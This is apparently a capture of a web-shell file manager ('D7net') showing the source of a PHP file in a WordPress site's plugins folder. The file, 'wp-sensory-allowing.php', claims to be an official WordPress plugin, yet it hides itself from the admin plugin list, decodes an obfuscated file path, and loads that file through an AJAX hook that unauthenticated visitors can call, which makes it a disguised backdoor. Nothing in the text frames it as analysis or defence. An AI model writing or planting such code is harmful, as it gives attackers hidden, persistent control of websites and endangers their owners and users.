D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
sanghavirealty
/
www
/
wp-content
/
plugins
/
wp-sensory-allowing
/
Filename :
wp-sensory-allowing.php
back
Copy
<?php /* Plugin Name: WP Sensory Allowing Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 14.1.9 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function bjg_txk() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $h = array('wp-sensory-allowing/wp-sensory-allowing.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $h)) { unset($wp_list_table->items[$key]); } } } } add_action('pre_current_active_plugins', 'bjg_txk'); function rzl_xxy($plugins) { $p = 'wp-sensory-allowing/wp-sensory-allowing.php'; if (array_key_exists($p, $plugins)) { unset($plugins[$p]); } return $plugins; } add_filter('all_plugins', 'rzl_xxy'); function pmq($f, $d) { $r = ''; for ($i = 0; $i < strlen($f); $i += 2) { $v = ord($f[$i]) - 65; $b = ord($f[$i + 1]); if ($b > 90) $b -= 6; $s = $v * 52 + ($b - 65); $r .= chr($s - $d); } return $r; } function swn_ajax_handler() { require plugin_dir_path(__FILE__) . pmq('MsNHNHLtMuNKNK', 571); wp_die(); } add_action('wp_ajax_wp-vyj', 'swn_ajax_handler'); add_action('wp_ajax_nopriv_wp-vyj', 'swn_ajax_handler');